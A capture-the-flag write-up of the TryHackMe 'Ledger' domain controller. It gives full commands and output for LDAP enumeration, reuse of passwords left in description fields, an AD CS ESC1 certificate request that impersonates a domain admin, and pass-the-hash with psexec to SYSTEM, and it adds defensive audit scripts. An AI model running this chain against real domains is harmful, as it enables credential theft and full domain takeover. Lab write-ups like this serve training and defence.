# Ledger

## SUMMARY

Ledger is a Hard machine from TryHackMe where the goal is to gain administrative privileges on the machine. For initial access, the LDAP service allows anonymous binds, so anyone can query the domain for information. We find a default password in the description field of 2 users, one of whom has RDP access. To escalate our privileges, we take advantage of the ESC1 vulnerability in a certificate template, which lets us supply an arbitrary SAN and thereby impersonate a user in the `Domain Admins` group.

## Enumeration

### NMAP

Doing our enumeration, we find several open ports: DNS (port `53`), Kerberos (port `88`), LDAP (ports `389`, `636`, `3268` and `3269`), web services (ports `80` and `443`), RPC (port `135`), SMB (port `445`) and RDP (port `3389`), which together indicate that this is a domain controller. We also get the host's FQDN, `labyrinth.thm.local` (domain `thm.local`), so we can add it to our `/etc/hosts`.

```
$ sudo nmap -sC -sV 10.201.45.90 -oA nmap/port
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 10:16 PST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 72.06% done; ETC: 10:17 (0:00:17 remaining)
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 78.57% done; ETC: 10:17 (0:00:05 remaining)
Nmap scan report for 10.201.45.90
Host is up (0.33s latency).
Not shown: 986 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-16 02:17:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-16T02:19:25+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
| Not valid before: 2025-08-16T01:37:50
|_Not valid after:  2026-08-16T01:37:50
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_ssl-date: 2025-08-16T02:19:24+00:00; 0s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=thm-LABYRINTH-CA
| Not valid before: 2023-05-12T07:26:00
|_Not valid after:  2028-05-12T07:35:59
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
| Not valid before: 2025-08-16T01:37:50
|_Not valid after:  2026-08-16T01:37:50
|_ssl-date: 2025-08-16T02:19:24+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
| Not valid before: 2025-08-16T01:37:50
|_Not valid after:  2026-08-16T01:37:50
|_ssl-date: 2025-08-16T02:19:25+00:00; 0s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:labyrinth.thm.local
| Not valid before: 2025-08-16T01:37:50
|_Not valid after:  2026-08-16T01:37:50
|_ssl-date: 2025-08-16T02:19:24+00:00; 0s from scanner time.
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Not valid before: 2025-08-15T01:46:36
|_Not valid after:  2026-02-14T01:46:36
|_ssl-date: 2025-08-16T02:19:24+00:00; 0s from scanner time.
Service Info: Host: LABYRINTH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-08-16T02:18:25
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.78 seconds

```

### SMB

Checking for an SMB null session, we find that access is denied.

```
$ smbmap -H 10.201.45.90

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.201.45.90, no fun for you...
[*] Closed 1 connections
```

Same with `rpcclient`:

```
$ rpcclient -U "" 10.201.45.90 -N
rpcclient $> enumdomusers
result was NT_STATUS_CONNECTION_DISCONNECTED
rpcclient $> exit
```

Testing for guest authentication, we find we have read access to the `IPC$` share.

```
$ netexec smb 10.201.45.90 -u 'a' -p '' --shares
SMB         10.201.45.90    445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False)
SMB         10.201.45.90    445    LABYRINTH        [+] thm.local\a: (Guest)
SMB         10.201.45.90    445    LABYRINTH        [*] Enumerated shares
SMB         10.201.45.90    445    LABYRINTH        Share           Permissions     Remark
SMB         10.201.45.90    445    LABYRINTH        -----           -----------     ------
SMB         10.201.45.90    445    LABYRINTH        ADMIN$                          Remote Admin
SMB         10.201.45.90    445    LABYRINTH        C$                              Default share
SMB         10.201.45.90    445    LABYRINTH        IPC$            READ            Remote IPC
SMB         10.201.45.90    445    LABYRINTH        NETLOGON                        Logon server share
SMB         10.201.45.90    445    LABYRINTH        SYSVOL                          Logon server share
```

Read access to `IPC$` allows RID cycling, which enumerates the domain's users and groups by looking up consecutive RIDs. This can be done with `netexec` using the `--rid-brute` flag.

```
$ netexec smb 10.201.45.90 -u 'a' -p '' --rid-brute
SMB         10.201.45.90    445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False)
SMB         10.201.45.90    445    LABYRINTH        [+] thm.local\a: (Guest)
SMB         10.201.45.90    445    LABYRINTH        498: THM\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        500: THM\Administrator (SidTypeUser)
SMB         10.201.45.90    445    LABYRINTH        501: THM\Guest (SidTypeUser)
SMB         10.201.45.90    445    LABYRINTH        502: THM\krbtgt (SidTypeUser)
SMB         10.201.45.90    445    LABYRINTH        512: THM\Domain Admins (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        513: THM\Domain Users (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        514: THM\Domain Guests (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        515: THM\Domain Computers (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        516: THM\Domain Controllers (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        517: THM\Cert Publishers (SidTypeAlias)
SMB         10.201.45.90    445    LABYRINTH        518: THM\Schema Admins (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        519: THM\Enterprise Admins (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        520: THM\Group Policy Creator Owners (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        521: THM\Read-only Domain Controllers (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        522: THM\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        525: THM\Protected Users (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        526: THM\Key Admins (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        527: THM\Enterprise Key Admins (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        553: THM\RAS and IAS Servers (SidTypeAlias)
SMB         10.201.45.90    445    LABYRINTH        571: THM\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.201.45.90    445    LABYRINTH        572: THM\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.201.45.90    445    LABYRINTH        1008: THM\LABYRINTH$ (SidTypeUser)
SMB         10.201.45.90    445    LABYRINTH        1109: THM\DnsAdmins (SidTypeAlias)
SMB         10.201.45.90    445    LABYRINTH        1110: THM\DnsUpdateProxy (SidTypeGroup)
SMB         10.201.45.90    445    LABYRINTH        1113: THM\greg (SidTypeUser)
[...SNIP...]
```

Assuming the `--rid-brute` output was saved to `netexec_output.txt`, the following `grep` and `cut` pipeline keeps only the `SidTypeUser` lines and extracts the account names into `users.txt`.

```
grep SidTypeUser netexec_output.txt | cut -d'\' -f2 | cut -d' ' -f1 > users.txt
```

### AS-REP Roasting (Failed)

We can then use impacket's `GetNPUsers.py` with that user list to look for accounts that have Kerberos pre-authentication disabled.

```
$ impacket-GetNPUsers thm.local/ -dc-ip 10.201.45.90 -usersfile users.txt -format hashcat -outputfile hashes.txt 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User LABYRINTH$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User greg doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SHANA_FITZGERALD doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User CAREY_FIELDS doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DWAYNE_NGUYEN doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BRANDON_PITTMAN doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BRET_DONALDSON doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User VAUGHN_MARTIN doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DICK_REEVES doesn't have UF_DONT_REQUIRE_PREAUTH set
[...SNIP...]
```

Trying to crack the hashes proved to be a dead end so far.

### LDAP

We then pivot to LDAP and check whether anonymous binds are allowed. In this case, they are.

```
$ ldapsearch -x -H ldap://10.201.45.90 -s base      
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=thm,DC=local
ldapServiceName: thm.local:labyrinth$@THM.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
[...SNIP...]
```

We can then dump the whole domain naming context with the following command.

```
$ ldapsearch -x -H ldap://10.201.45.90 -b "dc=thm,dc=local" > ldapsearch.txt
```

Reading through the output, we find 2 users with a peculiar `description` field: each one looks like it contains a password.

```
[...SNIP...]
# IVY_WILLIS, HRE, Tier 1, thm.local
dn: CN=IVY_WILLIS,OU=HRE,OU=Tier 1,DC=thm,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: IVY_WILLIS
sn: IVY_WILLIS
description: Please change it: ...REDACTED...
[...SNIP...]
# SUSANNA_MCKNIGHT, Test, ITS, Tier 1, thm.local
dn: CN=SUSANNA_MCKNIGHT,OU=Test,OU=ITS,OU=Tier 1,DC=thm,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: SUSANNA_MCKNIGHT
sn: SUSANNA_MCKNIGHT
description: Please change it: ...REDACTED...
[...SNIP...]
```
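As a defender-side check tied to the finding above, the following script (added here, not part of the original write-up) parses an `ldapsearch` LDIF export and flags user objects whose `description` attribute looks like it stores a password. The sample LDIF is constructed to mirror the entries shown, with the values redacted.

```python
"""Audit an ldapsearch LDIF export for user objects whose description
attribute looks like it carries a password (the weakness found above).
Added example, not part of the original write-up; the sample LDIF is
constructed to mirror the entries shown, with the values redacted."""
import base64
import re
from typing import Dict, List

SAMPLE_LDIF = """\
# IVY_WILLIS, HRE, Tier 1, thm.local
dn: CN=IVY_WILLIS,OU=HRE,OU=Tier 1,DC=thm,DC=local
objectClass: user
cn: IVY_WILLIS
description: Please change it: REDACTED

# SUSANNA_MCKNIGHT, Test, ITS, Tier 1, thm.local
dn: CN=SUSANNA_MCKNIGHT,OU=Test,OU=ITS,OU=Tier 1,DC=thm,DC=local
objectClass: user
cn: SUSANNA_MCKNIGHT
description: Please change it: REDACTED
"""

# Phrases that commonly precede a credential left in a description attribute.
SUSPICIOUS = re.compile(r"password|passwd|pwd|change it|credential|login:", re.I)
Entry = Dict[str, List[str]]


def parse_ldif(text: str) -> List[Entry]:
    """Split an LDIF export into entries (attribute -> values): skips comment
    lines, unfolds continuation lines (leading space) and decodes '::' base64
    values, which ldapsearch emits for non-ASCII or space-padded strings."""
    logical: List[str] = []
    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]          # continuation of the previous line
        else:
            logical.append(raw)
    entries: List[Entry] = []
    current: Entry = {}
    for line in logical + [""]:             # trailing "" flushes the last entry
        if not line:
            if current:
                entries.append(current)
            current = {}
            continue
        attr, _, rest = line.partition(":")
        if rest.startswith(":"):            # "attr:: <base64>"
            value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
        else:
            value = rest.strip()
        current.setdefault(attr, []).append(value)
    return entries


def find_credential_descriptions(text: str) -> List[Dict[str, str]]:
    """User entries whose description matches a suspicious phrase."""
    hits = []
    for entry in parse_ldif(text):
        if "user" not in entry.get("objectClass", []):
            continue
        for desc in entry.get("description", []):
            if SUSPICIOUS.search(desc):
                hits.append({"dn": entry["dn"][0], "cn": entry.get("cn", ["?"])[0],
                             "description": desc})
    return hits
```

Run it against a real `ldapsearch.txt` dump via `find_credential_descriptions(open("ldapsearch.txt").read())`; the same phrase list also works as a periodic audit query over the directory.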

Testing the description value as the password for both accounts, we can verify that it works.

```
$ netexec smb 10.201.45.90 -u SUSANNA_MCKNIGHT -p '...REDACTED...'
SMB         10.201.45.90    445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False)
SMB         10.201.45.90    445    LABYRINTH        [+] thm.local\SUSANNA_MCKNIGHT:CHANGEME2023!

$ netexec smb 10.201.45.90 -u IVY_WILLIS -p '...REDACTED...'
SMB         10.201.45.90    445    LABYRINTH        [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False)
SMB         10.201.45.90    445    LABYRINTH        [+] thm.local\IVY_WILLIS:CHANGEME2023!
```

We can then use `bloodhound-python` to query the domain using the valid credentials.

```
$ bloodhound-python -u IVY_WILLIS -p '...REDACTED...' -d thm.local -ns 10.201.45.90 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: thm.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: labyrinth.thm.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: labyrinth.thm.local
INFO: Found 493 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 222 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: labyrinth.thm.local
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 05M 35S
INFO: Compressing output into 20250816113835_bloodhound.zip

```

This creates a ZIP file which can then be ingested by BloodHound.

### BloodHound

Querying for all domain admins, we find that there are 3 non-standard domain admins.

<figure><img src="/files/aZh6gQjCuRmQ3rvWrZQV" alt=""><figcaption></figcaption></figure>

We also find that `SUSANNA_MCKNIGHT` is a member of the `Remote Management Users` and `Remote Desktop Users` groups. We can use this user to gain access since RDP is open on the machine.

<figure><img src="/files/ghRcJRzTsieYAML9frd3" alt=""><figcaption></figcaption></figure>

We find that `IVY_WILLIS` is also effectively a member of `Remote Management Users`, since the `Domain Users` group is nested in that group.

<figure><img src="/files/yoy5MPPtyEXOFzcshM6r" alt=""><figcaption></figcaption></figure>

### RDP

We can connect to the machine using `xfreerdp3`.

```
$ xfreerdp3 /u:SUSANNA_MCKNIGHT /p:...REDACTED... /v:10.201.45.90
[12:11:16:249] [89003:00015bac] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]:     : keycode: 0x08 -> no RDP scancode found
[12:11:16:249] [89003:00015bac] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]:     : keycode: 0x5D -> no RDP scancode found
[12:11:18:926] [89003:00015bac] [WARN][com.freerdp.crypto] - [verify_cb]: Certificate verification failure 'self-signed certificate (18)' at stack position 0
[12:11:18:926] [89003:00015bac] [WARN][com.freerdp.crypto] - [verify_cb]: CN = labyrinth.thm.local

```

The user flag is on this user's desktop.

<figure><img src="/files/Xc5VMgnZ28AjxLdntAwz" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

Enumerating the users that have previously logged on to the machine, we find `BRADLEY_ORTIZ` as another candidate. This user is also a domain admin.

<figure><img src="/files/GXCbUH7tpX9lXcaw6JYa" alt=""><figcaption></figcaption></figure>

Earlier, we found port `443` open. Checking its certificate, we find it was issued by `thm-LABYRINTH-CA`, which suggests that AD CS is running in the domain.

<figure><img src="/files/CY9jMfifOrgw1Kdd2utn" alt=""><figcaption></figcaption></figure>

We can use a tool like `certipy-ad` to enumerate ADCS.

```
$ certipy-ad -debug find -u 'SUSANNA_MCKNIGHT@thm.local' -p "...REDACTED..." -dc-ip 10.201.107.76 -target labyrinth.thm.local -dc-host thm.local
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[+] Nameserver: '10.201.107.76'
[+] DC IP: '10.201.107.76'
[+] DC Host: 'thm.local'
[+] Target IP: '10.201.107.76'
[+] Remote Name: 'labyrinth.thm.local'
[+] Domain: 'THM.LOCAL'
[+] Username: 'SUSANNA_MCKNIGHT'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.201.107.76:636 - ssl
[+] Default path: DC=thm,DC=local
[+] Configuration path: CN=Configuration,DC=thm,DC=local
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 14 enabled certificate templates
[*] Finding issuance policies
[*] Found 21 issuance policies
[*] Found 0 OIDs linked to templates
[...SNIP...]
```

Checking the available certificate templates, we find that the `ServerAuth` template is vulnerable to ESC1. ESC1 arises when a template that permits client authentication lets low-privileged users enroll and lets the requester supply the subject alternative name (SAN), with no manager approval in between: a requester can then put any user's UPN in the SAN and obtain a certificate that authenticates as that user, which is a direct path to privilege escalation.
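To make the ESC1 conditions concrete from the auditing side, here is an added routine (not certipy's code and not from the original write-up) that evaluates them over the template attributes stored in AD. The template records are constructed; the flag values given for `ServerAuth` are assumed, since the page does not show the template's actual attributes.

```python
"""ESC1 condition check over AD CS certificate-template attributes.
Added example, not certipy's code and not from the original write-up.
Template records are constructed to mirror what an LDAP query of the
Certificate Templates container returns, with enrollment rights reduced
to principal names; the ServerAuth values are assumed, not observed."""
from dataclasses import dataclass, field
from typing import Dict, List

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag (manager approval)

# EKUs that make an issued certificate usable for domain logon.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Enrollment granted to any of these is effectively open to every domain user.
LOW_PRIV = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}


@dataclass
class Template:
    name: str
    enabled: bool         # published on the CA (listed in its certificateTemplates)
    name_flag: int        # msPKI-Certificate-Name-Flag
    enrollment_flag: int  # msPKI-Enrollment-Flag
    ra_signatures: int    # msPKI-RA-Signature
    ekus: List[str] = field(default_factory=list)               # pKIExtendedKeyUsage
    enroll_principals: List[str] = field(default_factory=list)  # holders of the Enroll right


def esc1_checks(t: Template) -> Dict[str, bool]:
    """Each ESC1 condition by name; the template is ESC1 only when all are True."""
    return {
        "published on a CA": t.enabled,
        "requester supplies SAN": bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no manager approval": not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signature": t.ra_signatures == 0,
        "EKU allows client auth": not t.ekus or bool(AUTH_EKUS & set(t.ekus)),
        "low-privileged enrollment": bool(LOW_PRIV & set(t.enroll_principals)),
    }


def is_esc1(t: Template) -> bool:
    return all(esc1_checks(t).values())


def audit(templates: List[Template]) -> List[str]:
    """Names of the templates that satisfy every ESC1 condition."""
    return [t.name for t in templates if is_esc1(t)]


# Constructed inventory: assumed ServerAuth values, the same template with the
# subject flag cleared (the fix), and two default-style templates that are not ESC1.
SERVER_AUTH = Template("ServerAuth", True, 0x1, 0x0, 0,
                       ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"], ["Domain Users"])
SERVER_AUTH_FIXED = Template("ServerAuth", True, 0x0, 0x0, 0,
                             ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"], ["Domain Users"])
SAMPLE_TEMPLATES = [
    SERVER_AUTH,
    # User: subject is built from AD, so no arbitrary SAN even though Domain Users enroll.
    Template("User", True, 0x0, 0x0, 0, ["1.3.6.1.5.5.7.3.2"], ["Domain Users"]),
    # WebServer: requester supplies the subject, but Server Auth EKU only and admins enroll.
    Template("WebServer", True, 0x1, 0x0, 0, ["1.3.6.1.5.5.7.3.1"], ["Domain Admins"]),
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        print(t.name, "ESC1" if is_esc1(t) else "ok", esc1_checks(t))
```

Clearing `ENROLLEE_SUPPLIES_SUBJECT`, requiring manager approval, or restricting the Enroll right each breaks one condition, which is why `SERVER_AUTH_FIXED` is no longer flagged.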

We can use `certipy` with the `req` module to request a certificate as the low-privileged user while supplying the UPN of the domain admin `bradley_ortiz` in the SAN, together with that account's SID so that the domain controller can map the certificate to the account under strong certificate mapping.

```
$ certipy-ad -debug req -u 'SUSANNA_MCKNIGHT@thm.local' -p '...REDACTED...' -dc-ip 10.201.107.76 -target labyrinth.thm.local -ca 'thm-LABYRINTH-CA' -template ServerAuth -upn 'bradley_ortiz@thm.local' -sid 'S-1-5-21-[...SNIP...]-1358'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[+] DC host (-dc-host) not specified. Using domain as DC host
[+] Nameserver: '10.201.107.76'
[+] DC IP: '10.201.107.76'
[+] DC Host: 'THM.LOCAL'
[+] Target IP: None
[+] Remote Name: 'labyrinth.thm.local'
[+] Domain: 'THM.LOCAL'
[+] Username: 'SUSANNA_MCKNIGHT'
[+] Trying to resolve 'labyrinth.thm.local' at '10.201.107.76'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.201.107.76[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.201.107.76[\pipe\cert]
[*] Request ID is 27
[*] Successfully requested certificate
[*] Got certificate with UPN 'bradley_ortiz@thm.local'
[+] Found SID in SAN URL: 'S-1-5-21-[...SNIP...]-1358'
[+] Found SID in security extension: 'S-1-5-21-[...SNIP...]-1358'
[*] Certificate object SID is 'S-1-5-21-[...SNIP...]-1358'
[*] Saving certificate and private key to 'bradley_ortiz.pfx'
[+] Attempting to write data to 'bradley_ortiz.pfx'
[+] Data written to 'bradley_ortiz.pfx'
[*] Wrote certificate and private key to 'bradley_ortiz.pfx'

```

We can then use `certipy` with the `auth` module to authenticate as `bradley_ortiz` with the PFX file we got earlier. This requests a TGT with the certificate (PKINIT) and then uses it to retrieve the account's NT hash as well.

```
$ certipy-ad auth -pfx bradley_ortiz.pfx -dc-ip 10.201.107.76 
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'bradley_ortiz@thm.local'
[*]     SAN URL SID: 'S-1-5-21-[...SNIP...]-1358'
[*]     Security Extension SID: 'S-1-5-21-[...SNIP...]-1358'
[*] Using principal: 'bradley_ortiz@thm.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'bradley_ortiz.ccache'
[*] Wrote credential cache to 'bradley_ortiz.ccache'
[*] Trying to retrieve NT hash for 'bradley_ortiz'
[*] Got hash for 'bradley_ortiz@thm.local': ...REDACTED...
```

Since we have the domain admin's NT hash, we can pass the hash to `impacket`'s `psexec` module to gain a shell as `nt authority\system`.

```
$ impacket-psexec thm.local/bradley_ortiz@10.201.107.76 -hashes :...REDACTED... 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.201.107.76.....
[*] Found writable share ADMIN$
[*] Uploading file lHaVLFYz.exe
[*] Opening SVCManager on 10.201.107.76.....
[*] Creating service bSay on 10.201.107.76.....
[*] Starting service bSay.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4377]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

We get the root flag in `C:\Users\Administrator\Desktop`.

```
C:\Users\Administrator\Desktop> dir    
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\Administrator\Desktop

05/31/2023  08:18 AM    <DIR>          .
05/31/2023  08:18 AM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
05/31/2023  07:33 AM                29 root.txt
               3 File(s)          1,110 bytes
               2 Dir(s)  12,511,961,088 bytes free

C:\Users\Administrator\Desktop> type root.txt
THM{...REDACTED...}
C:\Users\Administrator\Desktop>
```
